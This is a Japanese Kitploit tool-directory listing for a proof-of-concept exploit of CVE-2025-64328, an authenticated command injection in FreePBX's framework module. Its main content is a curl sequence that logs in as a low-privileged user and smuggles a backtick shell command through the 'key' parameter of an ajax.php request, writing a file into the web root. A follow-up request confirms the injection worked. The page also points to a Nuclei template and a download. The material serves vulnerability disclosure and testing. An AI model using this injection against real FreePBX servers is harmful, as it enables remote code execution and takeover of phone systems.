Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-64328_FreePBX-framework-Command-Injection — CVE-2025-64328 FreePBX framework モジュールにおける認証済みコマンドインジェクション | Kitploit
ツール/GitHubGitHub/mcorybillington/cve-2025-64328_freepbx-framework-command-injection
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロール
GitHubmcorybillington/cve-2025-64328_freepbx-framework-command-injection

CVE-2025-64328_FreePBX-framework-Command-Injection

CVE-2025-64328 FreePBX framework モジュールにおける認証済みコマンドインジェクション

リポジトリを見る

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
19ヶ月前未レビュー

CVE-2025-64328 FreePBX の framework モジュールにおける認証済みコマンドインジェクション

CVE-2025-64328 FreePBX の framework モジュールにおける認証済みコマンドインジェクションのシンプルな概念実証リポジトリです。

完全な解説はこちら: https://theyhack.me/CVE-2025-64328-FreePBX-Authenticated-Command-Injection/

curl による概念実証

root@kitploit:~
$ curl -s \
-XPOST --cookie-jar /tmp/freepbx-cookie --data 'username=lowprivuser&password=<lowprivuserpassword>' http://192.168.122.206/admin/config.php -o /dev/null \
--next \
--cookie /tmp/freepbx-cookie -H 'Referer: http://192.168.122.206' 'http://192.168.122.206/admin/ajax.php?module=filestore&command=testconnection&driver=SSH&host=127.0.0.1&user=asdf&port=22&key=asdf`echo%20rcetest2>/var/www/html/rcetest.txt`&path=test' | jq
{
  "status": true,
  "message": "Login failed"
}

$ curl -sk http://192.168.122.206/rcetest.txt
rcetest2

Nuclei テンプレート:

CVE-2025-64328.yaml

ツールをダウンロード